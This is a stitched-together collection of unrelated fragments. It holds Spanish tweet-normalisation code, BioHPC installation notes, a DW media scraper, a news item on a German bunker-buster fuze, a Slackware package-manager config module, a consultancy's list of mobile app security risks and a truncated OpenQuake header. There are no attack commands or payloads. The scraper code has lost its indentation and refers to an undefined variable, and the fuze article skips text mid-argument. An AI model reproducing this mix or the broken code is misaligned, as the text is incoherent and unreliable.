                diminutives.append([normalised_f[:-1] + u'o',
                                    u'+'.join(changes + [u'a'])])
            elif normalised_f.endswith(u'o'):
                diminutives.append([normalised_f[:-1] + u'a',
                                    u'+'.join(changes + [u'o'])])
        # Perform phonetic transcription and recover real diminutives.
        diminutive_candidates = diminutives
        diminutives = []
        for candidate, changes in diminutive_candidates:
            real_words = _transducers_cascade(
                candidate, ['phonology', 'es-diminutives-fonemas'])
            for result in real_words:
                if changes is None:
                    diminutives.append(result)
                    continue
                elif changes == u'in':
                    diminutives.append(result[:-1] + 'ín'.decode('utf-8'))
                    continue
                # Undo the recorded edits in reverse order; the for/else
                # appends the reconstructed form once the loop completes
                # (no break occurs, so it always runs).
                for change in reversed(changes.split(u'+')):
                    if change == u's':
                        result = result + u's'
                    elif change == u'll':
                        result = re.sub(r'it([ao])', r'ill\1',
                                        result, flags=re.U)
                    elif change in [u'a', u'o']:
                        result = result[:-1] + change
                else:
                    diminutives.append(result)
        diminutives = np.unique(diminutives).tolist()
        if len(diminutives) == 1:
            target_words.append(diminutives[0])
        elif len(diminutives) > 1:
            # Keep only the diminutive most similar to the original word.
            longest_match_ratios = np.zeros(len(diminutives))
            for i, diminutive in enumerate(diminutives):
                longest_match_ratios[i] =\
                    _compute_longest_common_subsequence_ratio(
                        word, diminutive, False, True)
            target_words.append(diminutives[longest_match_ratios.argmax()])
    return np.unique(target_words).tolist()
def _filter_out_acronyms(variants, target_words, max_length):
    '''Filter target words identified as acronyms.

    An acronym is defined as a word composed only of consonants (i.e. with
    no vowels) — a partial definition — or written fully in uppercase. Such
    words are discarded when they do not match any of the normalised
    variants (to one and two repetitions) of the OOV word, and the variants
    are short (max_length < 5). Mutates and returns `target_words`.
    '''
    keep = []
    for target in target_words:
        target = _to_unicode(target)
        looks_like_acronym = (max_length < 5
                              and (target == target.upper()
                                   or not VOWELS_RE.search(target))
                              and target.lower() not in variants)
        keep.append(not looks_like_acronym)
    for i in range(len(target_words) - 1, -1, -1):
        if not keep[i]:
            target_words.pop(i)
    return target_words
def _are_target_words_only_acronyms(target_words):
    """Determine whether the suggested words consist only of acronyms.

    A word still counts as an acronym when written in lowercase but lacking
    a vowel after its first character.
    """
    for target in target_words:
        target = _to_unicode(target)
        is_acronym = (target.upper() == target
                      or not VOWELS_RE.search(target[1:]))
        if not is_acronym:
            return False
    return True
def _are_target_words_only_proper_nouns(target_words):
    """Evaluate whether the suggested words are only proper nouns (PNDs).

    Even a lowercase, vowel-less word is considered an acronym variant and
    therefore a PND; only a lowercase word containing a vowel counts as a
    regular word.
    """
    for target in target_words:
        target = _to_unicode(target)
        is_regular_word = (target.lower() == target
                           and VOWELS_RE.search(target))
        if is_regular_word:
            return False
    return True
def _suggest_target_words(word, case_type, external_dicc=None):
    """Suggest accepted (in-vocabulary) variants for the given token.

    Variants are produced in cascade: if one level generates no candidates,
    the next level is searched. If no level produces variants, the word
    itself is returned.

    params:
        word: unicode
            Word that is (probably) out of vocabulary. It must be lowercase,
            with characters outside the alphabet normalised to their ASCII
            representation.
        case_type: int
            How the OOV word was originally cased (see
            `_get_case_type_in_token`).
        external_dicc: dict
            Context-dependent (i.e. external) normalisation dictionary.
            (See explanation [1] in `SpellTweet.__init__`.)
    """
    # Variants of the word normalised to one or two character repetitions,
    # tracking the shortest and longest variant lengths.
    min_length, max_length = 0, 0
    normalised_variants = []
    for normalised_f in _foma_string_lookup(word, 'length_normalisation-2'):
        normalised_f = _deaccent(_to_unicode(normalised_f).lower())
        if min_length == 0 or len(normalised_f) < min_length:
            min_length = len(normalised_f)
        if len(normalised_f) > max_length:
            max_length = len(normalised_f)
        if normalised_f not in normalised_variants:
            normalised_variants.append(normalised_f)
    normalised_variants = np.unique(normalised_variants).tolist()
    target_words = []
    # Candidates consisting of the OOV word itself, taking into account how
    # it was originally written.
    oov_candidates = [word]
    if case_type != 0:
        oov_candidates.append(
            _recover_original_word_case_from_type(word, case_type))
    # 1. Primary variant generation:
    #    (Pre:) character-repetition normalisation.
    #    These variants are "marked" with one of the following suffixes:
    #    _LAUGH: laughter interjection (e.g. ja, je, ..., ju) — a variation,
    #            so the corresponding normalisation is returned.
    #    _EMO:   emoticon — not a variation but a non-Spanish token, so the
    #            form itself is returned.
    #    _NORM:  variant found in the normalisation dictionary — a
    #            variation, so the corresponding normalisation is returned.
    primary_variants = _foma_string_lookup(word, 'primary_variants')
    for variant in primary_variants:
        s = re.search(r"(.+?)_((?:emo)|(?:inter)|(?:laugh)|(?:norm))$",
                      variant, re.I|re.U)
        if s and s.group(2).lower() != 'emo':
            target_words.append(s.group(1))
        elif s:
            # Emoticon: emit a single '%EMO'-style marker and stop.
            target_words.append('%' + s.group(2))
            break
    if len(target_words) > 0:
        return target_words
    elif external_dicc is not None:
        # External, context-dependent normalisation dictionary.
        original_word = _recover_original_word_case_from_type(word, case_type)
        external_suggestions = _foma_string_lookup(
            original_word, 'external-dicc', external_dicc)
        target_words = external_suggestions
        if len(target_words) > 0:
            return target_words
    # Dictionary lookup.
    target_words = _transducers_cascade(word, ['dictionary_lookup', 'es-dicc'])
    target_words = _filter_target_words_by_length(target_words)
    # Check whether any of the dictionary candidates is also part of the
    # proper-noun gazetteer.
    aux_target_words = []
    for candidate in target_words:
        aux_target_words += _foma_string_lookup(
            _recover_original_word_case_from_type(candidate, 1),
            'pnd-gazetteer')
    target_words += aux_target_words
    if len(target_words) > 0:
        return np.unique(target_words).tolist()
    # 2. Secondary variant generation:
    #    (Pre:) character-repetition normalisation.
    #    These variants correspond to words that sound like the OOV word and
    #    may be dictionary entries or PND-gazetteer entries. To identify
    #    PNDs, the OOV word is repetition-normalised and grapheme/phoneme
    #    conversion is applied.
    target_words = _foma_string_lookup(word, 'secondary_variants-dicc')
    target_words += _check_affixes(word, normalised_variants)
    target_words = _filter_target_words_by_length(target_words)
    target_words += _transducers_cascade(
        word,
        ['length_normalisation', 'phonology', 'pnd-gazetteer-fonemas'])
    # No third-level variants are generated when this level already produced
    # words and/or proper nouns (containing at least one vowel). If the
    # candidates are only proper nouns, at least one must have an LCSR of
    # .55 or higher.
    filtering_PNDs = [
        _compute_longest_common_subsequence_ratio(word, candidate, True) >= .55
        for candidate in target_words]
    num_filtered_candidates = sum([1 if v_ else 0 for v_ in filtering_PNDs])
    if (len(target_words) > 0
            and (not _are_target_words_only_proper_nouns(target_words)
                 or (not _are_target_words_only_acronyms(target_words)
                     and num_filtered_candidates > 0))):
        target_words += oov_candidates
        target_words = np.unique(target_words).tolist()
        return _filter_out_acronyms(normalised_variants,
                                    target_words,
                                    max_length)
    # 3. Tertiary variant generation:
    #    (Pre:)
    #    + character-repetition normalisation,
    #    + accent removal,
    #    + insertion of a single vowel at any position (consonantal writing;
    #      NOTE: not used for IV-candidate generation nor for splitting
    #      fused words),
    #    + accent re-addition.
    #    Variants are generated as:
    #    1. Standard-dictionary words or PND-gazetteer entries at edit
    #       distance 1 (substitution, replacement, insertion).
    #    2. IV-candidate list entries that sound the same.
    #    3. Splitting of fused words (done over phonemes).
    target_words += _foma_string_lookup(word, 'tertiary_variants-dicc')
    target_words = _filter_target_words_by_length(target_words)
    target_words += _transducers_cascade(
        _foma_string_lookup(word, 'tertiary_variants-pnd'),
        ['pnd-gazetteer-case'])
    target_words += _transducers_cascade(
        word,
        ['length_normalisation', 'phonology', 'iv-candidates-fonemas'])
    fused_words = []
    if min_length > 3:
        # The split-words transducer is slow and not thread-safe, hence the
        # global lock and the 2-second timeout.
        LOCK.acquire()
        try:
            # http://stackoverflow.com/questions/8464391
            with Timeout(2):
                fused_words = _foma_string_lookup(word, 'split-words')
                if len(fused_words) > 0:
                    fused_words = _select_non_fused_words(fused_words)
        except Timeout.Timeout:
            # Timed out: discard results and restart the server.
            fused_words = []
            _switch_flookup_server('split-words', mode='on')
        LOCK.release()
    # Looser LCSR threshold for very short words.
    LCSR = .55
    if min_length == 2:
        LCSR = .5
    target_words = _filter_out_acronyms(normalised_variants,
                                        np.unique(target_words).tolist(),
                                        max_length)
    target_words = _filter_target_words_based_on_LCSR(word, target_words, LCSR)
    target_words += oov_candidates
    return np.unique(target_words).tolist() + np.unique(fused_words).tolist()
def _switch_normalisation_services(mode='on'):
    '''Start/stop the external services required by the model.

    `mode` is forwarded verbatim to each service switch ('on'/'off').
    '''
    for service_switch in (_switch_flookup_server, _switch_freeling_server):
        service_switch(mode=mode)
class SpellTweet(object):
    '''Analyses tweet text, identifies OOV words and suggests corrections.'''

    def __init__(self, external_dicc_ip=None, external_dicc_port=None):
        """Instantiate a lexical-normalisation model.

        params:
            external_dicc_ip: str
                IPv4 address of the context-dependent (i.e. external)
                normalisation dictionary. (See [1].)
            external_dicc_port: str
                Port on which requests for the normalisation dictionary are
                received.

        [1] `external_dicc_ip` and `external_dicc_port` specify a
        context-dependent (external) normalisation dictionary. That
        dictionary corresponds to a finite-state transducer that receives
        requests through a server instance.
        """
        # 3-gram language model used to rank candidate substitutions.
        self.language_model = kenlm.LanguageModel(CORPORA['eswiki-corpus-3-grams'])
        self.external_dicc = None
        if external_dicc_ip is not None and external_dicc_port is not None:
            # Same [name, transducer, ip, port]-style layout expected by
            # _foma_string_lookup's socket branch.
            self.external_dicc = {
                'external-dicc': [None, external_dicc_ip, external_dicc_port],}

    def list_oov_words(self, morphological_analysis, include_PND=True):
        """List the identified OOV words.

        A token is identified as OOV either because it received no analysis
        at all, or because it is recognised as a proper noun (its tag starts
        with NP) — the latter because some tweets are written wholly or
        partially in uppercase.

        params:
            include_PND: bool
                whether identified proper nouns are treated as OOV words.

        Returns an array with the following structure per OOV word:
            0 -> sentence in which it appears.
            1 -> position it occupies in the sentence.
            2 -> casing type (see `_get_case_type_in_token`):
                 0 -> fully lowercase.
                 1 -> initial letter uppercase.
                 2 -> fully or mostly uppercase.
            3 -> original form of the word.
            4 -> lowercase form of the word, decoded to ASCII when some of
                 its letters are not recognised.
            5 -> whether the word must start with an uppercase letter:
                 - at the start of a sentence,
                 - after a period, question or exclamation mark,
                 - after an ellipsis, when the OOV word itself starts
                   with an uppercase letter.
        """
        oov_words = []
        starts_with_uppercase = False
        for i, sentence in enumerate(morphological_analysis):
            # j: logical token position (NP tokens may expand); k: raw index.
            j, k = 0, 0
            for form, lemma, tag in sentence:
                if j == 0:
                    starts_with_uppercase = True
                # If the previous token is an ellipsis and the current token
                # starts with an uppercase letter, then the corrected form
                # (if it is an OOV) must start with an uppercase letter.
                if (k > 0 and morphological_analysis[i][k-1][2].startswith(u'F')
                        and re.match(r'\.{3,}$',
                                     morphological_analysis[i][k-1][0], re.U)
                        and form[0].upper() == form[0]):
                    starts_with_uppercase = True
                if lemma == '' and tag == '':
                    # No analysis at all: definitely OOV.
                    oov_words.append([i, j, _get_case_type_in_token(form),
                                      form,
                                      _normalize_unknown_symbols(form).lower(),
                                      starts_with_uppercase])
                    starts_with_uppercase = False
                elif (include_PND and tag.startswith('NP')
                        and not re.match('(?:#|@)', form, re.U)):
                    # Multi-word proper nouns are joined with '_' by the
                    # analyser; treat each component separately.
                    for token in form.split('_'):
                        # If the token is lowercase and found in the
                        # dictionary, discard it.
                        if (token.lower() == token and
                                len(_foma_string_lookup(token, 'es-dicc')) == 1):
                            j += 1
                            starts_with_uppercase = False
                            continue
                        oov_words.append([i, j,
                                          _get_case_type_in_token(token),
                                          token,
                                          _normalize_unknown_symbols(token).lower(),
                                          starts_with_uppercase])
                        j += 1
                        starts_with_uppercase = False
                    # Compensate for the trailing j += 1 below.
                    j -= 1
                elif tag.startswith(u'F'):
                    # Punctuation: sentence-ending marks force uppercase on
                    # the next token.
                    if tag.lower() in [u'fat', u'fit', u'fp']:
                        starts_with_uppercase = True
                    else:
                        starts_with_uppercase = False
                j += 1
                k += 1
        # If the OOV word starts with an uppercase letter (or is even fully
        # uppercase) and is found in the dictionary, it is kept as itself.
        for i, oov_word in enumerate(oov_words):
            if oov_word[2] == 0:
                continue
            search = _transducers_cascade(
                oov_word[3].lower(),
                ['dictionary_lookup', 'es-dicc'])
            if len(search) == 0:
                # Search for an enclitic pronoun.
                affixes_search = _check_affixes(
                    oov_word[3].lower(), [oov_word[3].lower()],
                    affix='suffix', what_affix='enclitic')
                if (oov_word[3].lower() in affixes_search
                        and len(affixes_search) == 1):
                    search.append(oov_word[3].lower())
                # Search for adverbs ending in -mente.
                search += _check_affixes(
                    oov_word[3].lower(), [oov_word[3].lower()],
                    affix='suffix', what_affix='mente')
                search = _filter_target_words_by_length(search)
            if (len(search) == 1
                    and _to_unicode(search[0]).lower() == oov_word[3].lower()):
                # Pin the word itself as its only candidate.
                oov_words[i].append([oov_word[3].lower()])
                oov_words[i][2] = 0
                if oov_words[i][5]:
                    oov_words[i][6][0] = _recover_original_word_case_from_type(
                        oov_words[i][6][0], 1)
        return oov_words

    def select_candidates(self, analysis, oov_words):
        '''Select the best candidates for each OOV word.

        Rebuilds the tweet with {OOV-n} placeholders, then scores every
        combination of candidates with the language model and keeps, per
        OOV word, the candidate of the best-scoring combination.
        '''
        tweet = u''
        j = 1
        # Rebuild the tweet text, replacing OOV tokens with placeholders.
        for i, sentence in enumerate(analysis):
            for form, lemma, tag in sentence:
                if len(tag) == 0:
                    tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
                    j += 1
                elif tag.startswith(u'NP') and not form.startswith((u'#', u'@')):
                    for token in form.split('_'):
                        if (token.lower() == token
                                and len(_foma_string_lookup(token, 'es-dicc')) == 1):
                            tweet = tweet + u' ' + token + u' '
                        else:
                            tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
                            j += 1
                elif form.startswith((u'#', u'@')) or not tag.startswith(u'F'):
                    if tag.startswith((u'Z', u'W')):
                        # Numbers/dates: keep only alphabetic material.
                        form = re.sub(
                            u"""[^a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1_]""", '',
                            form, flags=re.I|re.U)
                        if len(form) < 2:
                            continue
                    elif not tag.startswith(u'NP'):
                        form = form.lower()
                    tweet = tweet + u' ' + form + u' '
        # Collapse double spaces and repeated laughter.
        tweet = tweet.strip().replace(u'  ', u' ').replace(u'jajaja', u'ja')
        possible_concatenated_words = False
        param_grid = {}
        # Substitute singleton candidates directly; collect the rest into a
        # parameter grid for exhaustive search.
        for i, oov_word in enumerate(oov_words):
            if len(oov_word[6]) == 1 and oov_word[6][0] != '%EMO':
                tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[6][0])
            elif len(oov_word[6]) == 1:
                # Emoticon: keep the original form.
                tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[3])
                oov_words[i][6] = [oov_word[3]]
            else:
                param_grid['OOV-%i' % (i + 1)] = np.unique(oov_word[-1]).tolist()
                if not possible_concatenated_words:
                    # '_' in a candidate marks a split of fused words.
                    for candidate in param_grid['OOV-%i' % (i + 1)]:
                        if '_' in candidate:
                            possible_concatenated_words = True
        grid = ParameterGrid(param_grid)
        complete_search = True
        best_combination = []
        # Sentinel: 1000 means "no score computed yet".
        max_ppl_value = 1000
        for i, combination in enumerate(grid):
            if i == 100000:
                # Too many combinations: abort the exhaustive search.
                complete_search = False
                break
            t = tweet
            for oov_id, candidate in combination.iteritems():
                t = t.replace('{' + oov_id + '}', candidate.replace('_', ' '))
            # If only a single token is being normalised, disable the
            # sentence begin/end markers.
            bos = True
            eos = True
            if len(t.split(' ')) == 1 and not possible_concatenated_words:
                bos = False
                eos = False
            ppl_value = self.language_model.score(t, bos=bos, eos=eos)
            if max_ppl_value == 1000 or ppl_value > max_ppl_value:
                best_combination = combination
                max_ppl_value = ppl_value
        else:
            # for/else: runs only when the search completed (no break);
            # commit the winning candidate of the best combination.
            for oov, candidate in best_combination.iteritems():
                oov_id = int(oov.split('-')[1]) - 1
                idx = oov_words[oov_id][6].index(candidate)
                oov_words[oov_id][6] = [oov_words[oov_id][6][idx]]
        if not complete_search:
            # Fallback: greedily resolve each unresolved OOV word in turn,
            # keeping the other unresolved placeholders at their original
            # forms.
            for i in xrange(len(oov_words)):
                if len(oov_words[i][6]) == 1:
                    continue
                t = tweet
                for j in xrange(len(oov_words)):
                    if i == j:
                        continue
                    elif len(oov_words[j][6]) > 1:
                        t = t.replace('{OOV-%i}' % (j + 1), oov_words[j][3])
                ppl_values = np.zeros(len(oov_words[i][6]), dtype=float)
                for k, candidate in enumerate(oov_words[i][6]):
                    ppl_values[k] = self.language_model.score(
                        t.replace('{OOV-%i}' % (i + 1), candidate))
                best_candidate_idx = np.argmax(ppl_values)
                oov_words[i][6] = [oov_words[i][6][best_candidate_idx]]
                tweet = tweet.replace('{OOV-%i}' % (i + 1), oov_words[i][6][0])
        # Casing: identify the correct upper/lowercase form of the selected
        # candidate. The rules:
        # 1. If the selected candidate starts with an uppercase letter (or
        #    is fully uppercase), it stays as-is (needs no code).
        # 2. If the selected candidate is lowercase, is not in the standard
        #    dictionary and equals the OOV word itself, restore the casing
        #    the word originally had.
        # 3. If the selected candidate is lowercase and differs from the
        #    OOV word, capitalise it when it sits at the start of a
        #    sentence or after sentence-ending punctuation.
        for i, oov_word in enumerate(oov_words):
            if (oov_word[3].lower() == oov_word[6][0]):
                if len(_foma_string_lookup(oov_word[6][0], 'es-dicc')) == 0:
                    # Second rule.
                    oov_words[i][6][0] = _recover_original_word_case_from_type(
                        oov_word[6][0], oov_word[2])
                elif oov_word[5]:
                    oov_words[i][6][0] = _recover_original_word_case_from_type(
                        oov_word[6][0], 1)
            elif (oov_word[3].lower() != oov_word[6][0]
                    and oov_word[6][0].lower() == oov_word[6][0]
                    and oov_word[5]):
                # Third rule.
                oov_words[i][6][0] = _recover_original_word_case_from_type(
                    oov_word[6][0], 1)
        return oov_words

    def spell_tweet(self, text):
        '''Lexically analyse a tweet and correct it if necessary.

        params:
            text: str
                Tweet text.

        output:
            selected candidates: list
                Array with the identified OOV words and the selected
                candidates. One array per OOV word, structured as:
                    0, sentence in which it appears.
                    1, position it occupies in the sentence.
                    2, original form of the word.
                    3, selected candidate.
                    4, suggested candidates.

        NOTE(review): the original docstring also described an
        `only_suggest_candidates` flag, but no such parameter exists.
        '''
        if text == '':
            raise Exception('Debe especificar un texto a normalizar')
        else:
            text = _to_unicode(text)
        analysis = _analyze_morphologically(text)
        oov_words = self.list_oov_words(analysis)
        # For each out-of-vocabulary word, propose candidates in parallel
        # (entries of length 6 are those still lacking a candidate list).
        pool = multiprocessing.Pool(processes=4)
        candidates = [
            [i, pool.apply_async(_suggest_target_words,
                                 [oov_word[4], oov_word[2], self.external_dicc])]
            for i, oov_word in enumerate(oov_words) if len(oov_word) == 6]
        pool.close()
        pool.join()
        normalisation_candidates = {}
        for i, target_words in candidates:
            try:
                oov_words[i].append(target_words.get(timeout=3))
            except (ValueError, multiprocessing.TimeoutError):
                # Suggestion failed or timed out: fall back to the word
                # itself (in its original and lowercase forms) and restart
                # the flookup servers.
                oov_words[i].append(
                    np.unique([
                        oov_words[i][3],
                        oov_words[i][4],
                        _recover_original_word_case_from_type(
                            oov_words[i][4], oov_words[i][2])
                    ]).tolist())
                _switch_flookup_server(mode='on')
            normalisation_candidates[i] = oov_words[i][6]
        oov_words = self.select_candidates(analysis, oov_words)
        # Reshape each entry to the public 5-field structure.
        for i, oov in enumerate(oov_words):
            if i not in normalisation_candidates.keys():
                normalisation_candidates[i] = []
            oov_words[i] = [oov[0], oov[1], oov[3], oov[6][0],
                            np.unique(normalisation_candidates[i] + oov[6]).tolist()]
        return oov_words
|
You can download the entire BioHPC distribution as one compressed file BioHPC.zip from our ftp site. You will need to unpack the distribution and then follow the installation instructions from this web site or from the file INSTALL.txt included with the distribution. Web site instructions are updated more frequently. You may want to register with BioHPC in order to receive notifications about new releases and bug fixes.
We have just finished a new software distribution that includes the newest features (next-generation sequencing support, web services), but not all of them are described in the documentation yet. Please feel free to contact us with any questions; you can also download the old distribution below.
If you plan to use HPC Basic Profile in order to access remote clusters you will need to install a supplementary web service providing information about available resources that is missing in the HPC Basic Profile implementation. Otherwise BioHPC will not know how many nodes/cores are available at the moment and it will not be able to submit jobs based on resource availability.
Perl and Cygwin are also required on the cluster nodes, but their installers are included in the distribution.
You may also need Visual Studio 2008 if you want to modify and recompile the interface or any of the accompanying programs.
You will also need a cluster to run your computations. BioHPC supports clusters built on Microsoft Windows HPC Server 2008 or Microsoft Windows 2003 Compute Cluster Server (64 bit).
|
#!/usr/bin/env python
import uuid
import ConfigParser
import pymongo
import json
import requests
import sys, os
from os.path import isdir, join
import urllib2
from bs4 import BeautifulSoup
class ItemWriter:
def __init__(self, source, meta_format):
self.mongo_client = pymongo.MongoClient()
self.db = self.mongo_client['eumssi_db']
self.col = self.db['content_items']
self.source = source
self.format = meta_format
def write_item(self, item):
''' write item to MongoDB '''
try:
twuid = uuid.uuid4()
print "inserted: ", self.col.insert({'_id':uuid.uuid4(),'source':self.source,'meta':{'original':item, 'original_format':self.format},'processing':{'queues':{'metadata':'pending'}}})
except Exception as e:
print e
def find_item(self, item):
try:
cursor = self.col.find({'meta.original.reference.id': item['reference']['id']})
for i in cursor:
return "1"
except Exception as e:
print "exception: " , e
return None
def get_number_of_page(code):
    """Query the DW media-center API and return how many result pages
    exist for the given channel *code*."""
    url = "http://www.dw.com/api/list/mediacenter/%s?pageIndex=1" % code
    overview = json.loads(urllib2.urlopen(url).read())
    return overview['paginationInfo']['availablePages']
def getFullText(url):
    """Scrape an article page and return its intro paragraph followed by
    the long text body (either part may be missing)."""
    page = urllib2.urlopen(url).read()
    soup = BeautifulSoup(page, 'html.parser')
    pieces = []
    intro = soup.findAll('p', {'class': 'intro'})
    if len(intro) > 0:
        pieces.append(intro[0].text)
    body = soup.findAll('div', {'class': 'longText'})
    if len(body) > 0:
        pieces.append(body[0].text)
    return "".join(pieces)
'''
Extract items and insert to DB
'''
def fetch_data(language, duplicatecheck):
''' default values '''
code = 2
if language == 'es':
code = 28
if language == 'de':
code = 1
if language == 'fr':
code = 13
number_of_page = get_number_of_page(code)
if number_of_page is None:
return
icounter = 0
for i in range(1, number_of_page+1):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=" + str(i)
try:
itemset = json.loads(urllib2.urlopen(host).read())
#write data to mongo db
writer_video = ItemWriter('DW video','DW-MediaCenter-api')
writer_audio = ItemWriter('DW audio','DW-MediaCenter-api')
for item in itemset['items']:
tmp = None
if duplicatecheck=='1':
tmp = writer.find_item(item)
if tmp is None:
item['language'] = language
icounter+=1
itemdetail = json.loads(urllib2.urlopen(item['reference']['url']).read())
item['details'] = itemdetail
item['text'] = getFullText(itemdetail['permaLink'])
if len(item['text'])<100: #exceptional case
item['text'] = item['teaserText']
if 'type' in item:
if item['type']=='AudioTeaser':
writer_audio.write_item(item)
else:
if item['type']=='VideoTeaser':
writer_video.write_item(item)
else:
print 'item ', item['reference']['id'], 'exists in db already!'
except Exception as e:
print host
print e
# command-line entry point: python <script> <language> <duplicatecheck>
if __name__ == '__main__':
    print '!-----------------------------------------------------'
    print '!@usage: python [me] language duplicatecheck\n!\t--language: en,es,fr,de\n!\t--duplicatecheck:1 (check),0 (no check)'
    print '!-----------------------------------------------------'
    # NOTE(review): no argument-count check -- running without both
    # arguments raises IndexError after the usage banner
    language = sys.argv[1]        # e.g. 'en'
    duplicatecheck = sys.argv[2]  # '1' or '0'
    print 'Now fetching data for ', language, ' with the duplicate check option: ', duplicatecheck
    fetch_data(language, duplicatecheck)
|
If the US manages to build a bunker-buster powerful enough to knock out Iran's buried nuclear facilities, it can thank some ordnance geeks in Bavaria for helping get the job done.
Here's the story. The American-built FMU-159/B Hard Target Smart Fuze should have been a key part of US bunker-busting arsenal. But it didn't work. Or rather, it "experienced Engineering and Manufacturing Development qualification problems resulting in termination of the program."
...and you want to get the right one. Secondly, you don't want your bomb to overpenetrate, disappearing into the floor and burrowing fifty feet into the ground beneath the bunker before exploding with a faint thump.
The HTSF was supposed to have several modes, capable of counting the number of 'voids' or levels it passed through as well as working on time delay. It was to equip the heavyweight GBU-28 bomb as well as the AGM-86D cruise missile and a host of other weapons. Unfortunately, the aforementioned problems meant that it was not available, so the Pentagon had to fall back on simple FMU-143 time-delay fuzes.
Based on the success of the FCT effort, DTRA initiated a Product Improvement Program to package PIMPF for use with the Conventional Air-launched Cruise Missile (CALCM) in order to achieve requirements for standoff defeat of hard and deeply buried targets and to address deficiencies with the current CALCM fuze. This PIMPF PIP (now retitled as the Void Sensing Fuze Product Improvement Program) will integrate, qualify, test, and deliver the repackaged PIMPF for retrofit into the CALCM weapon system and set the stage for follow-on efforts to address smart fuze requirements for direct attack weapons."
It turns out that the TDW, makers of PIMPF, have been offering it to the US since 2002, as in this presentation entitled "The German Hard Target Fuze is ready." After five years of development, the US version was clearly not ready, and Uncle Sam was forced to buy the foreign product.
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# config.py file is part of slpkg.
# Copyright 2014-2015 Dimitris Zlatanidis <d.zlatanidis@gmail.com>
# All rights reserved.
# Slpkg is a user-friendly package manager for Slackware installations
# https://github.com/dslackw/slpkg
# Slpkg is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import shutil
import filecmp
import subprocess
from slpkg.utils import Utils
from slpkg.__metadata__ import MetaData as _meta_
class Config(object):
    """Print or edit slpkg configuration file
    """

    def __init__(self):
        # absolute path of the slpkg configuration file
        self.config_file = "/etc/slpkg/slpkg.conf"
        self.meta = _meta_

    def view(self):
        """Display the slpkg configuration file.

        Lines that set a recognized option are printed plain; every other
        line (comments, unknown entries) is printed in cyan.
        """
        known_options = (
            "RELEASE", "BUILD_PATH", "PACKAGES", "PATCHES", "CHECKMD5",
            "DEL_ALL", "DEL_BUILD", "SBO_BUILD_LOG", "MAKEFLAGS",
            "DEFAULT_ANSWER", "REMOVE_DEPS_ANSWER", "SKIP_UNST",
            "RSL_DEPS", "DEL_DEPS", "USE_COLORS", "DOWNDER",
            "DOWNDER_OPTIONS", "SLACKPKG_LOG", "ONLY_INSTALLED",
            "PRG_BAR", "EDITOR",
        )
        print("")  # new line at start
        for cfg_line in Utils().read_file(self.config_file).splitlines():
            is_option = (not cfg_line.startswith("#") and
                         cfg_line.split("=")[0] in known_options)
            if is_option:
                print("{0}".format(cfg_line))
            else:
                print("{0}{1}{2}".format(self.meta.color["CYAN"], cfg_line,
                                         self.meta.color["ENDC"]))
        print("")  # new line at end

    def edit(self):
        """Open the configuration file in the configured editor."""
        command = "{0} {1}".format(self.meta.editor, self.config_file)
        subprocess.call(command, shell=True)

    def reset(self):
        """Restore slpkg.conf from its pristine ``.orig`` copy and report
        whether the two files now match."""
        pristine = self.config_file + ".orig"
        shutil.copy2(pristine, self.config_file)
        if filecmp.cmp(pristine, self.config_file):
            print("{0}The reset was done{1}".format(
                self.meta.color["GREEN"], self.meta.color["ENDC"]))
        else:
            print("{0}Reset failed{1}".format(self.meta.color["RED"],
                                              self.meta.color["ENDC"]))
|
The increased usage of mobile applications running on smart phones or tablets raises new threats that can exploit vulnerabilities of these new technologies.
Weak Server Side Controls - Bad mobile application server code is caused by the rush to market, lack of security knowledge, frameworks that don’t prioritize security, lower security budgets for mobile applications, cross-platform development and compilation.
Insecure Data Storage- Devices file systems are often easily accessible through rooting or jailbreaking a device. Where data is not protected properly, all that is needed to view application data is to hook the phone up to a computer and use some specialized tools.
Insufficient Transport Layer Protection - If the application is coded poorly, threat agents can use techniques to view this sensitive data while it's traveling across the network.
Unintended Data Leakage - Unintended data leakage is a branch of insecure data storage. It includes all manner of vulnerabilities that can be introduced by the OS, frameworks, compiler environment, new hardware, etc, all without a developers knowledge.
Poor Authorization and Authentication - Less authentication factors, local authentication leading to client-side bypass vulnerabilities, usage of persistent authentication (remember me) functionality.
Broken Cryptography - The creation and use of custom encryption algorithms, use of insecure and/or deprecated algorithms, poor key management.
Client Side Injection - Supplied data is not being subject to proper input validation, disallowing code injection is not effectively implemented.
Security Decisions Via Untrusted Inputs - The mobile application does not restrict access based on a white-list of trusted applications when Inter Process Communications (IPC) are involved, and sensitive actions which are triggered through IPC entry points do not require user interaction before performing the action.
Improper Session Handling - Failure to invalidate sessions on the backend, lack of adequate timeout protection, failure to Properly Rotate Cookies, Insecure Token Creation.
Lack of Binary Protections - Hosting code in an untrustworthy environment, an environment in which the organization does not have physical control. This includes mobile clients, firmware in appliances, cloud spaces, or data centers within particular countries.
Infologica offers security audit and penetration testing services to help our customers to evaluate their exposure related to the usage of mobile applications.
Subscribe to our Newsletter Find out about our events, be informed about best management practices, security and consulting trends or about the new regulatory requirements mandatory for information systems.
|
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2017 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module exports :class:`BooreEtAl1993GSCBest`,
:class:`BooreEtAl1993GSCUpperLimit`, :class:`BooreEtAl1993GSCLowerLimit`.
"""
from __future__ import division
import numpy as np
from scipy.constants import g
